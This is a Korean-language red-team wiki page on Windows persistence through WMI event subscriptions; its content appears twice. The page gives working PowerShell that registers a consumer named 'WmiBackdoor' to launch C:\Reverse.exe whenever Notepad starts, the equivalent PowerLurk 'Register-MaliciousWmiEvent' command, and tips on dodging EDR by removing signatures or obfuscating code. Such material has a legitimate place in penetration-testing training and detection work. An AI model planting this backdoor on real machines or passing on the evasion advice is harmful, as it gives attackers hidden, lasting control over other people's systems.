WMI Event Subscription

PreviousCOM NextSSH Key Injection

Last updated 13 hours ago

Was this helpful?

WMI Event Subscription

WMI 이벤트를 통한 지속성은 EventConsumer, EventFilter, FilterToConsumerBinding 3개의

주요 WMI 클래스를 활용하는 강력한 기법입니다.

EventConsumer : 실행할 동작을 정의합니다. (Ex - PowerShell 실행)
EventFilter : 동작을 유발할 트리거 정의. (Ex - notepad.exe가 실행될 때마다 트리거)
FilterToConsumerBinding : EventConsumer와 EventFilter를 연결

PowerLurk는 WMI 이벤트 기반의 지속성 확보 도구로 윈도우 내장 기능을 이용하기 때문에

감지 우회를 노리는 측면이 강했지만, 오늘날에는 EDR에서 감지될 가능성이 높습니다.

회피 전략으로는 오픈소스에 있는 시그니처 코드를 제거한 후 사용하거나, 코드 난독화 등이 있습니다.

다른 방법으로는 코드가 길어지지만 WMI를 직접 생성하는 방법이 있습니다.

# 1. Event Consumer 생성 (실행할 명령 설정)
$consumer = ([WMIClass]"\\.\root\subscription:CommandLineEventConsumer").CreateInstance()
$consumer.Name = "WmiBackdoor "
$consumer.CommandLineTemplate = "C:\Reverse.exe"
$consumer.ExecutablePath = "C:\Reverse.exe"
$consumer.Put()

# 2. Event Filter 생성 (notepad.exe 프로세스 시작 시)
$filter = ([WMIClass]"\\.\root\subscription:__EventFilter").CreateInstance()
$filter.Name = "NotepadStartFilter"
$filter.EventNamespace = "root\cimv2"
$filter.QueryLanguage = "WQL"
$filter.Query = "SELECT * FROM __InstanceCreationEvent WITHIN 3 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'notepad.exe'"
$filter.Put()

# 3. Filter와 Consumer 바인딩
$binding = ([WMIClass]"\\.\root\subscription:__FilterToConsumerBinding").CreateInstance()
$binding.Filter = $filter.Path.RelativePath
$binding.Consumer = $consumer.Path.RelativePath
$binding.Put()

# PowerLurk 모듈 로드 및 이벤트 생성
PS C:\> Import-Module .\PowerLurk.ps1
PS C:\> Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Reverse.exe" -Trigger ProcessStart -ProcessName notepad.exe

현재 이벤트 트리거가 메모장이기 때문에, 해당 머신에서 메모장을 실행할 때마다 Reverse.exe 파일이 실행됩니다.

생성한 이벤트 제거 명령은 다음과 같습니다.

# 이벤트 제거
Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject

References

PreviousCOM NextSSH Key Injection

Last updated 13 hours ago

Was this helpful?

WMI 이벤트를 통한 지속성은 EventConsumer, EventFilter, FilterToConsumerBinding 3개의

주요 WMI 클래스를 활용하는 강력한 기법입니다.

EventConsumer : 실행할 동작을 정의합니다. (Ex - PowerShell 실행)
EventFilter : 동작을 유발할 트리거 정의. (Ex - notepad.exe가 실행될 때마다 트리거)
FilterToConsumerBinding : EventConsumer와 EventFilter를 연결

PowerLurk는 WMI 이벤트 기반의 지속성 확보 도구로 윈도우 내장 기능을 이용하기 때문에

감지 우회를 노리는 측면이 강했지만, 오늘날에는 EDR에서 감지될 가능성이 높습니다.

회피 전략으로는 오픈소스에 있는 시그니처 코드를 제거한 후 사용하거나, 코드 난독화 등이 있습니다.

다른 방법으로는 코드가 길어지지만 WMI를 직접 생성하는 방법이 있습니다.

# 1. Event Consumer 생성 (실행할 명령 설정)
$consumer = ([WMIClass]"\\.\root\subscription:CommandLineEventConsumer").CreateInstance()
$consumer.Name = "WmiBackdoor "
$consumer.CommandLineTemplate = "C:\Reverse.exe"
$consumer.ExecutablePath = "C:\Reverse.exe"
$consumer.Put()

# 2. Event Filter 생성 (notepad.exe 프로세스 시작 시)
$filter = ([WMIClass]"\\.\root\subscription:__EventFilter").CreateInstance()
$filter.Name = "NotepadStartFilter"
$filter.EventNamespace = "root\cimv2"
$filter.QueryLanguage = "WQL"
$filter.Query = "SELECT * FROM __InstanceCreationEvent WITHIN 3 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'notepad.exe'"
$filter.Put()

# 3. Filter와 Consumer 바인딩
$binding = ([WMIClass]"\\.\root\subscription:__FilterToConsumerBinding").CreateInstance()
$binding.Filter = $filter.Path.RelativePath
$binding.Consumer = $consumer.Path.RelativePath
$binding.Put()

# PowerLurk 모듈 로드 및 이벤트 생성
PS C:\> Import-Module .\PowerLurk.ps1
PS C:\> Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Reverse.exe" -Trigger ProcessStart -ProcessName notepad.exe

현재 이벤트 트리거가 메모장이기 때문에, 해당 머신에서 메모장을 실행할 때마다 Reverse.exe 파일이 실행됩니다.

생성한 이벤트 제거 명령은 다음과 같습니다.

# 이벤트 제거
Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject

References

Persistence – WMI Event SubscriptionPenetration Testing Lab